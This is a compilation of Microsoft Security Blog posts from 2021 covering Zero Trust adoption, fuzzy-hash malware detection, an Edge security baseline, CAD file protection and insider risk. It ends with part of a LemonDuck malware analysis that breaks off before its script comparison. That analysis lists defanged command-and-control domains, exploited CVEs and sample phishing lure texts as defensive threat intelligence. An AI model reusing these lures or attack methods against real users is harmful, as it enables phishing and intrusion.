In the face of this rapid change, Zero Trust has risen as a guiding cybersecurity strategy for organizations around the globe. A Zero Trust security model assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signals and data. It relies on contextual real-time policy enforcement to achieve least privileged access and minimize risks. Automation and machine learning are used to enable rapid detection, prevention, and remediation of attacks using behavior analytics and large datasets.

Early adopters are seeing the benefits—organizations operating with a Zero Trust mindset across their environments are more resilient, responsive, and protected than those with traditional perimeter-based security models.

Zero Trust adoption is accelerating

Today, we are publishing our Zero Trust Adoption Report 2021. In this report, we surveyed or interviewed more than 1,200 security decision-makers over a 12-month timeframe about their Zero Trust adoption journey. Highlights from our research include:

Zero Trust Adoption Report cover image with three overlapping colored circles.

  1. Zero Trust is now the top security priority. 96 percent of security decision-makers state that Zero Trust is critical to their organization’s success. Now that it’s been proven, the future of security firmly includes an emphasis on Zero Trust. When asked for top reasons of Zero Trust adoption, organizations cite increased security and compliance agility, speed of threat detection and remediation, and simplicity and availability of security analytics.
  2. Familiarity and adoption are growing rapidly. 90 percent of the security decision-makers we surveyed are familiar with Zero Trust and 76 percent are in the process of implementation—an increase from the last year of 20 percent and 6 percent, respectively.
  3. Hybrid work is driving adoption. The shift to hybrid work, accelerated by COVID-19, is also driving the move towards broader adoption of Zero Trust with 81 percent of organizations having already begun the move toward a hybrid workplace. Zero Trust will be critical to help maintain security amid the IT complexity that comes with hybrid work.
  4. More than half believe they’re ahead of their peers. 52 percent say that they are ahead of where they planned to be in their Zero Trust adoption, and 57 percent believe they are ahead of other organizations. It’s clear that the last 18 months have had a significant impact on adoption and organizations are getting more confident and efficient in their efforts.
  5. Zero Trust will remain a top priority with additional budget expected. More than half of respondents expect the relative importance of their Zero Trust strategy to increase by 2023. And not surprisingly, 73 percent expect their Zero Trust budget to increase. As organizations realize the additional benefits of Zero Trust and leaders continue to pull ahead, we expect to see an increase in these numbers.

This report showcases the Zero Trust adoption progress for organizations across diverse markets and industries. We hope that this research can help you accelerate your own Zero Trust adoption strategy, uncover the collective progress and prioritizations of your peers, and gain insights into the future state of this rapidly evolving space.

Read the full Microsoft Zero Trust Adoption Report for full details.

Additional resources

For an in-depth look at our latest updates that will help accelerate your Zero Trust journey, check out Vasu Jakkal’s blog, How to secure your hybrid work world with a Zero Trust approach, from earlier this month.

For technical guidance, visit our Zero Trust Guidance Center, a repository of information that provides specific guidance on implementing Zero Trust principles across their identities, endpoints, data, applications, networks, and infrastructure.

Check out the Microsoft Zero Trust Assessment tool to help you determine where you are in your Zero Trust implementation journey and offer action items to help reach key milestones.

For more information about Microsoft Zero Trust, please visit our website, and check out our deployment guides for step-by-step technical guidance.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Zero Trust Adoption Report: How does your organization compare? appeared first on Microsoft Security Blog.

Categories: cybersecurity, Zero Trust Tags:

Combing through the fuzz: Using fuzzy hashing and deep learning to counter malware detection evasion techniques

July 27th, 2021 No comments

Today’s cybersecurity threats continue to find ways to fly and stay under the radar. Cybercriminals use polymorphic malware because a slight change in the binary code or script could allow the said threats to avoid detection by traditional antivirus software. Threat actors customize their wares specific to their target organizations to increase their chances of breaking into and moving laterally through an entire corporate network, exfiltrating data, and leaving with little or no trace. The underground economy is rife with malware builders, Trojanized versions of legitimate applications, and other tools and services that allow malware operators to deploy highly evasive malware.

As the number of threats seen in the wild continues to increase exponentially, the continued evolution and innovation of their evasion tactics create a scenario where most malware is seen only once. Therefore, in today’s threat landscape, security solutions should no longer be just about the number of unique malware they can detect. Instead, they should deliver durable solutions that can defend against existing as well as future attacks. This requires comprehensive visibility into threats, coupled with the ability to process vast amounts of data. Microsoft 365 Defender provides such a capability using its cross-domain optics and the transformation of data into actionable security information through innovative applications of AI and machine learning methodologies.

We have previously discussed how we apply deep learning in detecting malicious PowerShell, exploring new approaches to classify malware, and in detecting threats via the fusion of behavior signals. In this blog post, we discuss a new approach that combines deep learning with fuzzy hashing. This approach utilizes fuzzy hashes as input to identify similarities among files and to determine if a sample is malicious or not. Then, a deep learning methodology inspired by natural language processing (NLP) better identifies similarities that actually matter, thus improving detection quality and scale of deployment.

This model aims to improve the overall accuracy of classifying malware and continue closing the gap between malware release and eventual detection. It can detect and block malware at first sight, a critical capability in defending against the wide range of threats, including sophisticated cyberattacks.

Case study: New NOBELIUM-related malware blocked at first sight

In March this year, Microsoft 365 Defender successfully blocked a file that would later be confirmed as a variant of the GoldMax malware. GoldMax, a command-and-control backdoor that persists on networks as a scheduled task impersonating systems management software, is part the of tools, tactics, and procedures (TTPs) of NOBELIUM, the threat actor behind the attacks against SolarWinds in December 2020.

Microsoft was able to proactively defend its customers from this newly discovered GoldMax variant because it leveraged two main technologies: fuzzy hashing, which serves as the input, and deep learning techniques inspired by NLP and computer vision, among others.

The earliest GoldMax sample, which Microsoft detects as Trojan:Win64/GoldMax.A!dha, was first submitted on VirusTotal in September 2020. While the new file was confirmed to be GoldMax variant in June 2021, or three months after Microsoft first blocked it, we started defending customers as soon as we saw it. As seen in the screenshots below, the new file’s TLSH and SSDEP hashes—the fuzzy hashes exposed on VirusTotal—are observably similar to the first GoldMax variant. Both files also have the exact ImpHash and file size, further supporting our initial conclusion that the second file is also part of the GoldMax family.

Screenshots of showing file properties of original GoldMax malware and the new variant

Figure 1. File properties of the first GoldMax variant (top) and the new file detected in March (bottom) (from VirusTotal)

In the next sections, we discuss fuzzy hashes and how we use them in conjunction with deep learning to detect new and unknown threats.

Understanding fuzzy hashes

Hashing has become an essential technique in malware research literature and beyond because its output—hashes—are commonly used as checksums or unique identifiers. For example, it is common practice to use SHA-256 cryptographic hash to query a knowledge database like VirusTotal to determine whether a file is malicious or not. The first antivirus products operated this way before antivirus signatures existed.

However, to identify or detect similar malware, traditional cryptographic hashing poses a challenge because of its inherent property called cryptographic diffusion, whose purpose is to hide the relationship between the original entity and the hash so that these are still considered one-way functions. With this property, even a minimal change in the original entity—in this case, a file—yields a radically different, undetected hash.

Below are screenshots that illustrate this principle. The word change in the text file and the resulting change in the MD5 hash represent the effect of changes in binary content of other files:

Screenshots of two text files opened in Notepad showing a minor difference in text and comparing their MD5 hashes

Figure 2. Example of cryptographic hashing

Fuzzy hashing breaks the aforementioned cryptographic diffusion while still hiding the relationship between entity and hash. In doing so, this method provides similar resulting hashes when given similar inputs. Fuzzy hashing is the key to finding new malware that looks like something we have seen previously.

Like cryptographic hashes, there are several algorithms to calculate a fuzzy hash. Some examples are Nilsimsa, TLSH, SSDEEP, or sdhash. Using the previous text files example, below is a screenshot of their SSDEEP hashes. Note how observably similar these hashes are because there is only a one-word difference in the text:

Screenshot of Windows PowerShell showing fuzzy hashing for two text files

Figure 3. Example of fuzzy hashing

The main benefit of fuzzy hashes is similarity. Since these hashes can be calculated on several parts or the entirety of a file, we can focus on hash sequences that are like one another. This is important in determining the maliciousness of a previously undetected file and in categorizing malware according to type, family, malicious behavior, or even related threat actor.

Fuzzy hashes as “natural language” for deep learning

Deep learning in its many applications has recently been remarkable at modeling natural human language. For example, convolutional architectures, recursive architectures like Gated Recurrent Units (GRUs) or Long Short Term Memory networks (LSTMs), and most recently attention-based networks like all the variants of Transformers have been proven to be state-of-the-art in tackling human language tasks like sentiment analysis, question answering, or machine translation. As such, we explored if similar techniques can be applied to computer languages like binary code, with fuzzy hashing as an intermediate step to reduce sequence complexity and length of the original space. We discovered that segments of fuzzy hashes could be treated as “words,” and some sequences of such words could indicate maliciousness.

Architecture overview and deployment at scale

A common deep learning approach in dealing with words is to use word embeddings. However, because fuzzy hashes are not exactly natural language, we could not simply use pre-trained models. Instead, we needed to train our embeddings from scratch to identify malicious indicators.

Once with these embeddings, we attempted to do most things with a language deep neural network. We explored different architectures using standard techniques from literature, explored convolutions over these embeddings, attempted with multilayer perceptrons, and tried traditional sequential models (like the previously-mentioned LSTM and GRU) and attention-based networks (Transformers).

Diagram showing architecture of fuzzy hashing model

Figure 4. Architecture overview of the deep learning model using fuzzy hashes

We got fairly good results with most techniques. However, to deploy and enable this model to the Microsoft 365 Defender, we looked into other factors like inference times and the number of parameters in the network. Inference time ruled out the sequential models because even though they were the best in terms of precision or recall, they are the slowest to run inference on. Meanwhile, the Transformers we experimented on also yielded excellent results but had several million parameters. Such parameters will be too costly to deploy at scale .

That left us with the convolutional approach and multilayer perceptron. The perceptron yielded slightly better results between these two because the spatial adjacency intrinsically provided by the convolutional filters does not properly capture the relationship among the embeddings.

Once we had landed on a viable architecture, we used modern tools available to us that Microsoft continues to extend. We used Azure Machine Learning GPU capabilities to train these models at scale, then exported them to Open Neural Network Exchange (ONNX), which gave us the extra performance we needed to operationalize this at scale on Microsoft Defender Cloud.

Deep learning fuzzy hashes: Looking for the similarities that matter

A question that arises from an approach like this is: why use deep learning at all?

Adding machine learning allows us to learn which similarities on fuzzy hashes matter and which ones don’t. Additionally, adding deep learning and training on vast amounts of data increases the accuracy of malware classification and allows us to understand the minor nuances that differentiate legitimate software from its malware or Trojanized versions.

A deep learning approach also has its inherent benefits, one of which is creating big pre-trains on massive amounts of data. One can then reuse this model for different classification, clustering, and other scenarios by using its transfer learning properties. This is similar to how modern NLP approaches language tasks, like how OpenAI’s GPT3 solves question answering.

Another inherent benefit of deep learning is that one does not have to retrain the model from scratch. Since new data is constantly flowing into the Microsoft Defender Cloud, we can fine-tune the model with these incoming data to adapt and quickly respond to an ever-changing threat landscape.

Conclusion: Continuing to harness the immense potential of deep learning in security

Deep learning continues to provide opportunities to improve threat detection significantly. The deep learning approach discussed in this blog entry is just one of the ways we at Microsoft apply deep learning in our protection technologies to detect and block evasive threats. Data scientists, threat experts, and product teams work together to build AI-driven solutions and investigation experiences.

By treating fuzzy hashes as “words” and not mere codes, we proved that natural language techniques in deep learning are viable methods to solve the current challenges in the threat landscape. This change in perspective presents different possibilities in cybersecurity innovation that we are looking forward to exploring further.

Numerous AI-driven technologies like this allow Microsoft 365 Defender to automatically analyze massive amounts of data and quickly identify malware and other threats. As the GoldMax case study showed, the ability to identify new and unknown malware is a critical aspect of the coordinated defense that Microsoft 365 Defender delivers to protect customers against the most sophisticated threats.

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft 365 Defender.


Edir Garcia Lazo

Microsoft 365 Defender Research Team

The post Combing through the fuzz: Using fuzzy hashing and deep learning to counter malware detection evasion techniques appeared first on Microsoft Security Blog.

Security baseline for Microsoft Edge v92

July 26th, 2021 No comments

We are pleased to announce the enterprise-ready release of the security baseline for Microsoft Edge version 92!


We have reviewed the settings in Microsoft Edge version 92 and updated our guidance with the addition of 3 settings and the removal of 1 setting. A new Microsoft Edge security baseline package was just released to the Download Center. You can download the new package from the Security Compliance Toolkit.



Specifies whether SharedArrayBuffers can be used in a non cross-origin-isolated context

To prevent cross-origin data theft, JavaScript SharedArrayBuffers can only be used from cross-origin-isolated contexts. To maintain proper cross-origin security, this policy should not be used to relax the isolation restriction. The security baseline has prohibited this and configured this setting to Disabled.



Allow unconfigured sites to be reloaded in Internet Explorer mode

When it comes to security, administrators are the experts. Allowing an end-user to relax their security posture without awareness of the implications doesn’t usually end well, especially when attackers can use social-engineering techniques to trick users into making unsafe choices. Therefore, the security baseline forbids allowing end-users to open arbitrary websites in IE mode.


NOTE: If your enterprise has legacy sites that still require IE mode, you should configure them using the IE mode policies outlined here.



Specifies whether to allow insecure websites to make requests to more-private network endpoints

Allowing public internet sites to “peek” behind your firewall by using the user’s browser to mix intranet resources into internet-delivered pages represents a dangerous attack surface, and browsers are beginning to introduce restrictions upon such architectures. The baseline requires enforcement of the new browser restriction that any such intranet requests are blocked if the internet page was delivered over insecure HTTP.


NOTE: If for some reason you need to permit insecure cross-network requests for legacy sites, you can configure temporary exceptions in ‘Allow the listed sites to make requests to more-private network endpoints from insecure contexts’



Allow certificates signed using SHA-1 when issued by local trust anchors

As we communicated in the version 85 release, this setting was temporary and a bridge for organizations. We have removed this setting from the baseline as the setting is considered obsolete and there is no supported mechanism to allow SHA-1 any longer, even for certificates issued by your non-public Certificate Authorities.



Microsoft Edge version 92 introduced 11 new computer settings and 11 new user settings. We have included a spreadsheet in the release to make it easier for you to find them.


As a friendly reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.


Please continue to give us feedback through the Security Baseline Community or this post.

Categories: Uncategorized Tags:

How to protect your CAD data files with MIP and HALOCAD

July 22nd, 2021 No comments

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA.

Computer-aided design (CAD) files are used by design professionals in the manufacturing, engineering, architecture, surveying, and construction industries. These highly valuable files contain confidential information and form their core intellectual property (IP).

Loss of such proprietary information to an outsider or a competitor can have disastrous effects leading to a loss in sales, market share, and reduced profit margins. However, such industries often collaborate with other design partners or vendors or they share their design parts with smaller manufacturers. Product blueprints and designs are regularly exchanged, both within and outside the organization’s network boundaries. In such cases, there is a high possibility of a data leak.

Data loss or theft can occur in any one of the following ways:

  1. Every time you send a file to another person, a copy is usually made and stored online. Once the file leaves the organization there is no guarantee that it is safe unless it is adequately protected.
  2. Storing and transferring the file to another system.
  3. A malicious insider may have a copy of the file and the ability to share the information with an outsider, even after leaving the organization.

Microsoft Information Protection works where perimeter security fails

Organizations may use encryption programs, secure file transfer protocol, and other access control methods to prevent data leaks and data theft. However, once these files leave their original repository it is very difficult to keep track of their usage.

To solve this problem, organizations have invested in Microsoft Information Protection (MIP) an intelligent, unified, and extensible solution to protect sensitive data across your enterprise—in Microsoft 365 cloud services, on-premises, third-party software as a service (SaaS) applications, and more. MIP provides a unified set of capabilities to know your data, protect your data, and help prevent data loss across Microsoft 365 apps (such as Word, PowerPoint, Excel, and Outlook) and services (such as Teams, SharePoint, and Exchange).

Microsoft Information Protection capabilities.

When you have already invested in an excellent information protection system, it isn’t a prudent decision to go in for another information protection system. But what can be done to solve the above problem?

MIP and HALOCAD for secured digital collaboration at a global scale

SECUDE has integrated their HALOCAD solution with Microsoft’s MIP SDK which extends the data protection beyond the organization’s IT perimeter. HALOCAD not only integrates as a MIP SDK add-in into the content authoring environment but also works as an add-on into the content repository and implements information protection policies across supported repositories.

HALOCAD solution architectural diagram 1

With over two decades of experience in the data security field, SECUDE has a track record of adding value to the MIP capabilities to SAP environments, especially when exporting sensitive information from SAP environments. HALOCAD helps to seamlessly leverage MIP labeling templates for CAD files and does so simply and cost-effectively. It also applies the label to the content repository where the engineering processes for storing and sharing CAD files are kept.

Let us look at a hypothetical scenario on how data collaboration happens between the engineering team and the external third party vendors and suppliers with HALOCAD and MIP:

HALOCAD solution architectural diagram 2

In the above scenario, the design files move seamlessly across the supply chain with MIP sensitivity labels applied automatically and user privileges as defined by the organization.

Scenario 1 (Designer):

The user is the designer who owns the design files. Based on the user privilege defined, the designer can view, edit, copy, print, and export the files

Scenario 2 (Engineer):

The user is an engineer who consumes the design file shared with them by the engineering team. The engineer can view and edit the files. They can make modifications to the original file and share it. They do not have the privilege to copy, print, export, and use the snipping tool to make a copy.

Scenario 3 (Partner who has SECUDE solution):

In a typical manufacturing environment, the CAD drawings are shared with a lot of third-party partners and vendors across the supply chain for day-to-day operations. In this scenario, the partner who has purchased the SECUDE solution can only view the CAD files per the set privilege enforcement.

Scenario 4 (Unauthorized user):

If an unauthorized user outside of the organization tries to open the CAD drawings, the files are encrypted, and he will not be able to open the file.

Benefits of SECUDE’s HALOCAD

  1. HALOCAD extends the security templates provided by MIP to sensitive CAD files throughout the design lifecycle.
  2. HALOCAD applies sensitivity labels automatically during the check-out process without user engagement.
  3. HALOCAD preserves the extension of the file, allowing users to not see the difference and the workflow is not disrupted.
  4. An unauthorized user using an AutoCAD application without the HALOCAD extension tries to open a document, they will not be able to open the file through the extension is *.dwg.
  5. HALOCAD currently supports the following CAD applications:
    • Autodesk Inventor and AutoCAD
    • PTC Creo
    • Siemens NX and Solid Edge
  1. HALOCAD also supports the following PLM applications:
    • PTC Windchill
    • Siemens Teamcenter

For more information about the HALOCAD solution, please visit the SECUDE HALOCAD website. You can also find HALOCAD in Azure Marketplace.

Learn more

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


The post How to protect your CAD data files with MIP and HALOCAD appeared first on Microsoft Security Blog.

A guide to balancing external threats and insider risk

July 22nd, 2021 No comments

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Product Marketing Manager Natalia Godyla talks with Rockwell Automation Vice President and Chief Information Security Officer Dawn Cappelli. In this blog post, Dawn talks about the importance of including insider risk in your cybersecurity plan. 

Natalia: What is the biggest barrier that organizations face in addressing insider risk?

Dawn: The biggest barrier is drawing attention to insider risk. We heard about the ransomware group bringing down the Colonial Pipeline. We hear about ransomware attacks exposing organizations’ intellectual property (IP). We’re not hearing a lot about insider threats. We haven’t had a big insider threat case since Edward Snowden so that sometimes makes it hard to get buy-in for an insider risk program. But I guarantee insider threats are happening. Intellectual property is being stolen and systems are being sabotaged. The question is whether they are being detected—are companies looking?

Natalia: How do you assess the success of an insider risk program?

Dawn: First, we measure our success by significant cases. For instance, we have someone leaving the company to go to a competitor, we catch them copying confidential information that they clearly want to take with them, and we get it back.

Second, we measure success by looking at the team’s productivity. Everyone in the company has a risk score based on suspicious or anomalous activity as well as contextual data, for instance, they are leaving the company. Every day we start at the top of the dashboard with the highest risk and work our way down. We look at how many cases have no findings because that means we’re wasting time, and we need to adjust our risk models to eliminate false positives.

We also look at the reduction in cases because we focus a lot on deterrence, communication, and awareness, as well as cases by business unit and by region. We run targeted campaigns and training for specific business units or types of employees, regions, or countries, and then look at whether those were effective in reducing the number of cases.

Natalia: How does measuring internal threats differ from measuring external threats?

Dawn: From an external risk perspective, you need to do the same thing—see if your external controls are working and if they’re blocking significant threats. Our Computer Security Incident Response Team (CSIRT) also looks at the time to contain and the time to remediate. We should also measure how long it takes to respond and recover IP taken by insiders.

By the way, I like using the term “insider risk” instead of “insider threat” because we find that most suspicious insider activity we detect and respond to is not intentionally malicious. Especially during COVID-19, we see more employees who are concerned about backing up their computer, so they pull out their personal hard drive and use it to make a backup. They don’t have malicious intent, but we still must remediate the risk. Next week they could be recruited by a competitor, and we can’t take the chance that they happen to have a copy of our confidential information on a removable media device or in personal cloud storage.

Natalia: How do you balance protecting against external threats and managing insider risks?

Dawn: You need to consider both. You should be doing threat modeling for external threats and insider risks and prioritizing your security controls accordingly. An insider can do anything an external attacker can do. There was a case in the media recently where someone tried to bribe an insider to plug in an infected USB drive to get malware onto the company’s network or open an infected attachment in an email to spread the malware. An external attacker can get in and do what they want to do much easier through an insider.

We use the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) for our security program, and we use it to design a holistic security program that encompasses both external and insider security risks. For example, we identify our critical assets and who should have access to them, including insiders and third parties. We protect those assets from unauthorized access—including insiders and outsiders. We detect anomalous or suspicious behavior from insiders and outsiders. We respond to all incidents and recover when necessary. We have different processes, teams, and technologies for our insider risk program, but we also use many of the same tools as the CSIRT, like our Security Information and Event Management (SIEM) and Microsoft Office 365 tools.

Natalia: What best practices would you recommend for data governance and information protection?

Dawn: Don’t think about insider threats only from an IP perspective. There’s also the threat of insider cyber sabotage, which means you need to detect and respond to activities like insiders downloading hacking tools or sabotaging your product source code.

Think about it: an external attacker has to get into the network, figure out where the development environment is, get the access they need to compromise the source code or development environment, plant the malicious code or backdoor into the product—all without being detected. It would be a lot easier for an insider to do that because they know where the development environment is, they have access to it, and they know how the development processes work.

When considering threat types, I wouldn’t say that you need to focus more on cyber sabotage than IP; you need to focus on them equally. The mitigations and detections are different for IP theft versus sabotage. For theft of IP, we’re not looking for people trying to download malware, but for sabotage, we are. The response processes are also different depending on the threat vector.

Natalia: Who needs to be involved in managing and reducing insider risk, and how?

Dawn: You need an owner for your insider risk program, and in my opinion, that should be the Chief Information Security Officer (CISO). HR is a key member of the virtual insider risk team because happy people don’t typically commit sabotage; it’s employees who are angry and upset, and they tend to come to the attention of HR. Every person in Rockwell HR takes mandatory insider risk training every year, so they know the behaviors to look for.

Legal is another critical member of the team. We can’t randomly take people’s computers and do forensics for no good reason, especially in light of all the privacy regulations around the world. The insider risk investigations team is in our legal department and works with legal, HR, and managers. For any case involving personal information and any case in Europe, we go to our Chief Privacy Officer and make sure that we’re adhering to all the privacy laws. In some countries, we also have to go to the Works Council and let them know we’re investigating an employee. The security team is responsible for all the controls—preventive, detective—technology, and risk models.

Natalia: What’s next in the world of data regulation?

Dawn: Privacy is the biggest issue. The Works Councils in Europe are becoming stronger and more diligent. They are protecting the privacy of their fellow employees, and the privacy review processes make the deployment of monitoring technology more challenging.

In the current cyber threat environment, we must figure out how to get security and privacy to work together. My advice to companies operating in Europe is to go to the Works Councils as soon as you’re thinking about purchasing new technology. Make them part of the process and be totally transparent with them. Don’t wait until you’re ready to deploy.

Natalia: How will advancements like cloud computing and AI change the risk landscape?

Dawn: We have a cloud environment, and our employees are using it to develop products. From inception, the insider risk team worked to ensure that we’re always threat modeling the environment. We go through the entire NIST CSF for that cloud environment and look at it from both an external and insider risk perspective.

Companies use empirical, objective data to create and train AI models for their products. The question becomes, “Do you have controls to identify an insider who deliberately wants to bias your models or put something malicious into your AI models to make it go off course later?” With any type of threat, ask if an insider could facilitate this type of attack. An insider can do anything an outsider can do, and they can do it much easier.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A guide to balancing external threats and insider risk appeared first on Microsoft Security Blog.

When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure

July 22nd, 2021 No comments

[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 will be a deep dive on the attacker behavior and will provide investigation guidance.]

Combating and preventing today’s threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines—even so-called commodity malware—can bring in more dangerous threats. We’ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that’s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck’s threat to enterprises is also in the fact that it’s a cross-platform threat. It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others—and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems.

This threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.

In the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.

Figure 1. Global distribution of LemonDuck botnet activity

In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.

In-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.

LemonDuck and LemonCat infrastructure

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.

LemonDuck is named after the variable “Lemon_Duck” in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.

LemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.

The first, which we call the “Duck” infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing “Lemon_Duck” explicitly in script.

The second infrastructure, which we call “Cat” infrastructure—for primarily using two domains with the word “cat” in them (sqlnetcat[.]com, netcatkit[.]com)—emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.


Sample Duck domains Sample Cat domains
  • cdnimages[.]xyz
  • bb3u9[.]com
  • zz3r0[.]com
  • pp6r1[.]com
  • amynx[.]com
  • ackng[.]com
  • hwqloan[.]com
  • js88[.]ag
  • zer9g[.]com
  • b69kq[.]com
  • sqlnetcat[.]com
  • netcatkit[.]com
  • down[.]sqlnetcat[.]com


The Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as “blackball”. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.

The fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.

Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures

Initial access

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.

LemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).

Once inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.

Because of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don’t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.

From mid-2020 to March 2021, LemonDuck’s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.


Sample email subjects Sample email body content
  • The Truth of COVID-19
  • COVID-19 nCov Special info WHO
  • WTF
  • What the fcuk
  • good bye
  • farewell letter
  • broken file
  • This is your order?
  • Virus actually comes from United States of America
  • very important infomation for Covid-19
  • see attached document for your action and discretion.
  • the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.
  • what’s wrong with you?are you out of your mind!!!!!
  • are you out of your mind!!!!!what ‘s wrong with you?
  • good bye, keep in touch
  • can you help me to fix the file,i can’t read it
  • file is brokened, i can’t open it

The attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named “readme”. Occasionally, all three types are present in the same email.

Figure 3. Sample email

While the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as custom detection rules.

Since LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.


April 2020 PowerShell script March 2021 PowerShell script
